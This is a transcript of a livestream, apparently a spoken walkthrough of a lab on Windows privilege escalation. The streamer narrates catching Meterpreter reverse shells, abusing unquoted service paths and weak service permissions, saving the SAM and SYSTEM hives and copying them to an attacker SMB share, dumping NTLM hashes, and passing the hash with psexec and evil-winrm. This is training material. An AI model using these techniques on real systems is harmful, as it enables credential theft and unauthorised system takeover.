TCP. Interpreter reverse TCP. Set our L host to ton 0. Set our L port to 8888. Run that. And let's go ahead and start this service. Thought I just got something back already. But let's say how. Service isn't even started. Sc start. Windows scheduler. And we should receive something back over here. Should run that. We should receive something back. Should. And we do have interpreter session 1 open. Let's go and do a PS. Let's go ahead and migrate to something that's a little bit better for us. Like spool service, something like that. Not seeing spool service on here though. It's not really the best shell we have here now, is it? I'm not seeing spool service on here. Alright, that's okay. Yep, it died. So we definitely need to migrate into something quickly. So we can always try to migrate into... I don't want to do like PowerShell because that gets closed and it's kind of screwed. I want to do something, maybe Explorer, migrate into Explorer. Run that again. We'll run this again. Sc stop. Windows scheduler. Sc start. Windows scheduler. Once we get that callback, we're going to migrate into a different service so it doesn't kick us out like that again. Migrate into 1348. That was Explorer.exe. Ooh, insufficient privileges. Get UID. Okay, can we migrate into maybe 5340 and just hope that PowerShell doesn't get closed out? No, we cannot. We just got to move quick. Man, we got to move quick. Wonder how... Yeah, we definitely get a reverse shell, but we got to move quick. The airport is pissing me off. Oh, boy. Okay, so we're going to have to just move quick pretty much. We're just going to have to see CD into there, into the desktop. We're just going to have that ready to go. So let's go ahead and CD into C, that, users, desktop. I forget what it is, SVC user 1. We're just going to have to kind of just have that quick ready to go. Let's go ahead and try this one more time. Sc start. Windows scheduler. what's at the airport right now. I guess it's her ticket says one thing and the little screen thing says another thing. And it's not they are added up and nobody's helping her out, I guess. So that's not cool. See there. What? Oh my god. No! I messed up. SVC user 1. USER. Forgot who I am. This is horrible. This is the worst. USR 1. Desktop. Okay. Try this one more time. Run. Oh. Run that again. We're going to try this one more time. SC start. Windows scheduler. Nobody ever says it's going to be easy. There we go. Got it. There's the first one. Problem is when that service finally figures out I can't start, it just closes out. Alright, next one. That was a little bit of pain, but that's okay. Next one we have is unquoted service path, which we know we have an unquoted service path. We already saw that in the beginning of this at what is it? And we know that we can mess with it from power up. Showed us that we can mess with the disk sorter one, right? Let's go ahead and CD into C drive. What was it? Disk sorter, right? What was it? CD in my programs. Disk sorter enterprise. PowerShell. And let's go ahead and do a wget for. Let's go ahead. We already got the MSF Venom file. We can just use that same exact file. I did call it, so we are going to have to move it. But whenever we do out file, we'll just change the name. So instead of WS service, we're going to make it disk.exe. So we're going to go ahead and we're just going to go into here. We're going to do a wget again. There we go. But instead of WS service, we're going to call it disk.exe. It's denied. Access to this path is denied. Okay. So we may not be able to do a wget there. But I wonder if we can copy something in there. Let's go and CD into users. So I'm on prib. Let's try that same command again. And let's go ahead and try to copy disk.exe into here. C, my programs, disk sorter. Can't copy it. Access is denied. Really? Do I have to be service 1 to be able to do that, I wonder? Because if so, that's going to be a huge pain. Maybe we just won't run. No, because the service is still going to exit out. How are we going to do this one like right here? Let's go ahead and run power up again. .13.26.184 power up .ps1. Remember, invoke all checks is already on there, so we won't have to do anything with that. All right. So let's go ahead and look at this is being ran by service 3. That's service permissions though. So yeah, disorder enterprise being ran by service 2. I wonder if we can do an invoke service abuse on it. Let's try that. Let's try doing invoke service abuse on disorder on this guy. So we're going to do an invoke service abuse. Service name is going to be this, like right here. See if we can do that. Yeah, access denied. Okay. How are we going to do this like right here? Because I wonder if I have to be. So yeah, he can definitely. So he can mess with that. So we did see that power up. That's cool. Service user 3 can do this part of it. For service permissions, he can mess with thm-service.exe. But how am I going to do this unquote service path if I can't actually put anything in that file? Because he's saying to do it like right there in the disorder enterprise. And he's saying my programs dis.exe. Oh my god. Because we just wanted my programs. I always messed it. I told you I always mess this up. So we need to go into my programs. So let's go ahead and cd into C my programs. Now we put in dis.exe. So now what we're going to do is we're going to do a wget. We're just going to change that just like I did before. Yep, just like that. Our file is going to be dis.exe, dir, and there we go. We got dis.exe like right there. Let's go ahead and run the command over here again. We'll run this guy because it should be the same exact thing, right? And then all we got to do is we just have to command prompt sc stop and then sc start. It's already stopped, it looks like. That should be it. Is it because I did 1/4 around it? Is that why? SC start. Okay, that's why. Alright, so we should get called back over here. Service user 2 desktop type flag.text, and there we go. We got service user 2 now. You can also do something where you actually put in a command here. So we could do something where we actually add a user in or something like that, and then try to make him like an administrator or something. So what we can do is, if I do an invoke all checks again, or PowerShell again, and then we do a grab power up again. We'll do an invoke all checks. Whoops. And we have this write service binary service name. I think I got to say the path. I was going to give it the path this time, because I usually don't give it the path. Usually it just does it. But I want to try to give it the path this time. Path is going to be C program files. Or my program, excuse me, C my program. I'll try that real quick. Invoke service abuse. Service name. We should have a path in here for write service binary. Nope, just password. Just password, that's it, huh? Okay. I thought we had a path in there for some reason. Then we could tell what we actually wanted to write to. I thought we could do that. Okay. Even it says like right here, attack path abuse function. Wonder why it's not doing it for us. That's weird. Very, very strange. Alright, let's continue on with this guy then. So usually those work for me also. The like invoke service abuse, things like that. So the last one we have is the insecure service permissions. Alright, it wants us to check that THM service, which we did find in this my program files, right? And we see this THM service.exe. And we did also find that in PowerUp whenever we did our invoke all checks. We did see that THM service is being ran by service user 3. Okay. So I wonder if we can actually do this like right here. I think I already tried this though, didn't I? We're going to go ahead. We're going to count back into command prompt. We're just going to try quick net or sc stop. THM service. Sc start. THM service. And that user, we'll see if John's in there now. He's not. That's good. All right, so that one did not work for us like right there. But there's other things that we could do because we know that we can mess with it and then become privilege 3, right? So what we do is this. When we transfer reverse shell executable on the machine, it's stored in C user's THM on priv. Feel free to use wget transfer to executable and move it to the location. Remember to grant permission to everyone to execute your payload. All right, so first thing we have to do is allow everyone to be able to execute our payload. Do I have to actually do that? We'll see. We'll see here in a second. That's kind of weird to me that I have to do that. So we'll just make the same exact thing again. We'll just use that same exact guy again. And we'll go ahead and we will just call him, I guess. So to change the service associated executable and account, we can use the following command: minus space that with equal signs with sc config THM service bin path. Okay, so we can actually change the path for it. Really now? Okay. So I like that. So that's probably why we have to do it for everyone, like right there. Okay, so let's go ahead and grab, I think the last, we'll change it over to shell or something like that, right? So we'll go ahead and we'll cd back. Let's go ahead and cd in a dist order, or actually at dist.exe. Let's go and rename dist.exe to shell.exe. And we will probably just keep it just like that, can't we? We'll just say that our export path is going to be that, right? So we'll just do something like that. Well, yeah, because we just say ICACLs, right? And we want to say to make shell.exe / grant everyone / grant, and we're going to grant full access. Everyone full access. Okay, cool. So we made this guy like right here, right? Boom, boom. Actually, don't want to do it like that. We're going to do it like this. I'm just going to say uploaded shell.exe. Secure service permissions. Go all the way down. Upload a shell.exe or whatever else you want to call it. Make sure everyone has full permissions to it. Okay. From here, let's go ahead and do our next step. So we are going to change the path that's associated to. So ours is called shell.exe, so we'll change that like right there to shell.exe, right? And ours is actually just bin path is actually going to be C. My programs. Oh, I did not want to do that. Okay, we'll just go type in the whole thing. See my programs. My programs / /shell.exe. Okay, that changed successfully. All right, awesome. Beautiful day. From here, we just need to stop and start service. Let's make sure that we actually have a... We'll run that again. And let's go ahead and stop and start service. So we'll say sc stop thm service and sc start thm service. Hop back over here and we'll see if we get that shell. cd into our shell. C users, I guess svc user 3 desktop. Okay, cd //administrator. So strh administrator. cd in desktop. I think we gotta go to the administrator's desktop. I'm pretty sure that's what this thing actually says. Is yeah. Go to the administrator's desktop. Okay. Shell cd and c users administrator desktop dir type flag.text. And there we go. Let's go. All right. That was definitely a longer one, like right there. That was definitely a longer one. All right, abusing dangerous privileges. Well, this one looks like a longer one too. Might take a break here in a minute. I got pee too. I have to pee a lot. All right, so we will do a little that guy. That's abusing dangerous abusing privs. Just gonna say that. So a little who am I /priv, and we also have to start up a new machine, don't we? So let's go ahead and terminate this guy. We're gonna start this guy up. Well, that guy's starting up since he can take up to 5 minutes. I'm gonna take a quick break since that could take a minute to start up. I will leave you with the sweet sounds of, I guess, Slipknot this time. I don't know. What do you guys want to listen to? I'm gonna leave you guys with some, you know, chill music. All right. Let's do a Revolution. Actually, I can't leave you with anything because I'm recording like right now, so that's actually not going to work. So never mind. All right. So I will be right back. I'm going to go to the bathroom real quick. And yep. All right. So continuing on with this box should be good to go now. Let's hop back into there and we can go ahead and start to mess with this guy. So do we have THM backup as the user this time? So let's grab our new IP address, 10.10.102.105. THM backup copy master 555. It's funny. Like right there, I think I messed up the password though. Oh, nope, got it. Okay, cool. We're in. Super difficult to get in, but we're in. All right, back on here. Let's go ahead and open up a little Windows PowerShell here. And we'll do a who am I /priv. And we don't really have any privileges on here like right now. Open command prompt, check our privileges. Are we in a administrators group? Administrators in the administrators group. Why does it say to run as administrator? This account is part of backup operators group, which is by default to grant the SE backup and SE restore privileges. Is it really now? Okay. So let's go ahead and open it up as administrator then. Run as administrator. THM backup. And we are copy master 555 is our password. Okay, there we go. We're in again. So now let's check our privileges. whoami/priv, not whoami/program files. And now we got a couple more. Nope, a lot of them are disabled. Okay. So we open that up. We got quite a few that are disabled. To back up the SAM system hashes, we use following commands. Okay, so this is going to be, since we're part of the backup groups, we can back stuff up. Guess we could always do a net user. Let's do a whoami like real quick. And then do net user THM backup to see who he belongs to. And yes, we are backup operators. There we go. That would have been a better one to show. There we go. We'll go ahead and we'll paste that in there. Go ahead and copy this guy like right here, since we are the copy master. Go ahead and throw him up there, and we'll continue to go. So, since we are backup operators, we can look at the registries here. Go ahead and throw that in there. And let's go ahead and look at that like real quick. So we'll copy this reg save. We're going to save it in THM backup system hive, the HKLM system, and HKLM SAM, it looks like. Let's go ahead and try that like real quick. Can I do it in PowerShell? Okay, let's go ahead and CD into C users THM backup. THM backup, just make sure I actually did it. And it did. We got our system hive in there. And let's go ahead and do the same exact thing with this guy right here. The SAM. Alright, cool. I'm going to copy both of those commands and put them back in my guy so that I have them for future also. So I can just copy and paste them like right in there, change the username, and just go from there. All right, awesome. So, continuing on. We have now saved the SAM file and the system hive. All right, this will create a couple files with the registry hives content. We can now copy these files onto our attack machine using SMB or any other available method. For SMB, you can use inpackets SMB server.py to start a simple SMB server with a network share in your current directory of our attack box. All right, we may also be able to do it with WinRM, but he's not part of the remote management users group. We may also be able to host a, let's see here, is there a web file on this guy? Because we would be able to also put him on a website and download like that. Let's go ahead and copy that, see if there's a outbound facing website that we could use. See if port 80 is up and running. It is. Port 80 is there. So we may be able to put him into the web server and do like that. Let's go ahead and see CD into okay, so we may be able to put them in there and copy it over like that also. So let's go ahead and copy from C users THM backup, and we'll do sam.hive, and we'll also do, oh, nope, I cannot copy them into there. Darn. All right, so it looks like we're going to try to use that SMB server that we have like right there. Because I can't copy them over there. I was thinking copy over there, download them off the site. But let's go ahead and within our directory over here, we will make a directory for share. CD into share. And we're just going to throw it at it like this. Let me go ahead and also make sure that I have these notes. Okay. So we can do that. And then we can try and run this smb server.py, which let's go ahead and, I can't just run it, can I? Didn't think so. Can I do that? Nope. Locate smb server.py. So it should be within in packet. They're saying. So we'll go ahead and we'll run a Python 3, and we'll run it for this guy. Python 3. Make sure that actually works. Okay, cool. smb server.py. SMB2 support, the username, the password, public share. Okay, so we need the username and password obviously for this, and then public share. Where is my guy at? There we go. All right, did we do it? No idea if we did that or not. This is create a share public pointing to the shared directory, which requires the username and password of our current Windows session. After this, we use the copy command in our Windows machine to transfer both files into our task box. Really now? Let's go ahead and try that real quick. It was 10.13.26.184 is my guy. Password's not found. Probably because mine is within that whole directory, huh? Mine's much deeper than just that. So we probably have to do a lot more. Give me 1 second. We'll watch the video of the kids at the airport. They're just jacking up some chairs. They're bored. They flew back to America from Okinawa, Japan. It's a 12-hour flight itself, and then you still gotta. That's just to Seattle. You still gotta do a whole bunch of stuff from there. So they're bored. All right. So we want to actually do. It's not just gonna be /public. It's actually going to be. Ours is in home, Kali, desktop. Ours is in this whole thing. So we want to actually copy that. And I think we actually want to do it like this. Network path's not found. Okay. Let's figure something out here, huh? I wonder if I can do it the other way. I wonder if they can all be like this. I don't think so, but we can try it. I really don't think so. Go ahead and give it a quick try. Also have no idea if that guy's even up and running or not. See, he's doing it in his root directory, like right there. Maybe we should just do it straight up in the root directory. We'll make a share in there. Let's go ahead and try that. Let's go ahead and cd into there. Try that. And we'll try to run that first command again. Network paths are not found. C users, boom, boom. Alright. What path is not found, I'm wondering. This will create a share named public point to the shared directory which requires the username and password of our current Windows session. After this, we can use copy command. Try that like right there. Make a directory share in the root folder. I'll try to run that same command again. And we'll try to throw it over into, maybe it's just Python. Maybe it's not Python 3 because I'm not getting any feedback. That's super weird. Okay, let's go ahead and throw it over into here again. I feel like this has to be share. That doesn't make sense to me. That's public. This will create a share named public pointing to the shared directory. Okay. Let's keep sharing there. Doesn't seem to be making the file that I actually want. Let's go ahead and locate smb server.py again. Let's try something like this. That worked. Okay, there we go. All right. So that one worked. Now we just need to pass it over into here, right? And we want to actually make it public, or whatever it is. Stop doing that. Stop doing what you're doing. You actually want to call it public. I know, you're not finding it. It's called public. Alright, cool. So let's go ahead and... Oh, get their hash. That's nice. Let's go ahead and do this. There we go. And we'll go ahead and we'll throw him... Delete that. Save that. Did we already show what that's actually going to do? No, we did not. Copy him. Throw him into here. There we go. Alright. Much better. Much, much better. So let's now go to use impact to retrieve the user's passwords hashes. We don't need to do that if we retrieved it. Well, I guess since we just grabbed that one file, then we're going to grab the other file, then we're actually going to look at those files, actually grab it. Yeah, okay. So we got the SamHive file, and now we need the other file in there, right? System file in there, right? System.hive, throw that into there. And now we should have both those files in there, right? Should. And we grab an NTLM hash too. I mean, it's the one that we already knew. We already put it in there, but hey, you know, we got it. It's getting there. It's doing something. Okay. So let's go ahead and CD into share. Yeah, we're definitely getting them. All right, cool. And that looks like it is it, like right there. So let's go ahead and Control C out of that guy. We're done with him. Now that we're in share, we want to get our secrets dump.py. So let's go ahead and locate secrets dump.py. And we'll grab him. And we'll throw him at the share one. With the SAM and then the system file. And then I guess we just say local. Tac SAM. It's going to be sam.hive. Tac system is going to be system.hive. Then we say local. Okay, let's try with Python. Don't think that's actually doing anything for me like right there. So let's try a different one here. There we go. There we go. I don't know why Impact has so much stuff on there. I have like 5 different ones for some reason. There we go. Okay. So now we got that, right? I'm going to print screen that guy. Let me actually move him over like a little bit so I can get a better picture of him. There we go. And now we have that. Now local. Okay. Awesome. Let's go. Let's go ahead and throw that in my cherry tree. And we'll do that like right there. Cool. Now that we have those hashes, and those are NTLM hashes? Yes, they are. There's some NTLM hashes like right here. I was hoping it would dump it down to like local or whatever, something like that. So now we can try to crack these hashes with John. Let's go ahead and nano hash.text like real quick. Throw those into there. Then we'll do a John hash.text wordless boom boom fork equals NT. See if we can crack anything. He cannot. Alright, so he's not able to crack any of them, but we did get some hashes there. Could try to do a pass the hash from here. Yep, that's exactly what he's doing. He's doing a PS exec with a hash. So he's passing the hash for who administrator. Okay. So let's go ahead and locate psexec.py. See, I've done this one before. Go ahead and grab him. Python 3. Okay, psexec.py. Make sure that actually runs. Yep, it does. All right. And we are going to run that with attack H. We're going to throw the administrator hash in there. So we're going to say attack hashes. We're going to throw the administrator hash in there. We'll throw the whole thing in there. I don't think it needs the whole thing. I think it only needs the NT, which would actually be the ladder side. So this is LM, that's NT. But we're going to throw the whole thing in there for now. From there, key through the whole thing in. Then we're just going to say what to attack. So administrator at the IP address. And as long as we're able to log in with psexec.py, we should be good. We should be able to pass the hash. And sure enough, we logged in as NT Authority System because we're using a pass the hash with psexec.py. Sure enough, we got it. Awesome. All right, cool. We probably could have logged in with evil WinRM also. Let's go and try that. We can do it evil WinRM if he's able to log in, that is. For the IP address of 10.10.102.105. So if the administrator is able to log in using it, we may be able to do this also. Attack U administrator. Attack H. And we'll throw his hash in there. We'll try like that. He usually likes the NT though. We'll try the NTLM, then we'll just go to NT after that. We'll try the whole thing. Then we'll just try the NT after that. Okay, so let's just do just NT then. Or is it capital H? Oh, it's capital H, that's why. Yep, he just wants the NT hash though. So if he's allowed to log in through WinRM, we should be able to do that, and we can. All right, cool. So we got that guy all done, right? Let's go ahead and look at SE take ownership. All right, and I think this is actually be the last one for me for this grouping like right here, and we'll do these two tomorrow in another video because this video is taking longer, much longer than I thought it was going to. So we'll do an SE take ownership now. So we're going to go into a different user. And he too can already become an administrator. So let's go ahead and throw that into here. Actually, this part, like right here, is probably going to be my last part. Because this video is going on for quite a while. And yeah, I think we're just, we're going to be done for now. Might hit it back up later on tonight. But yeah, for now, we're going to be done. Let's go ahead and check out who else is streaming. B7H30, as always. So let's go ahead and grab him, and we'll raid him. Not going to be the biggest raid, but we've also been streaming for 2-something hours. So you guys have a good one. Thanks a lot for watching. Thanks a lot for sticking around. I'll talk to you all later.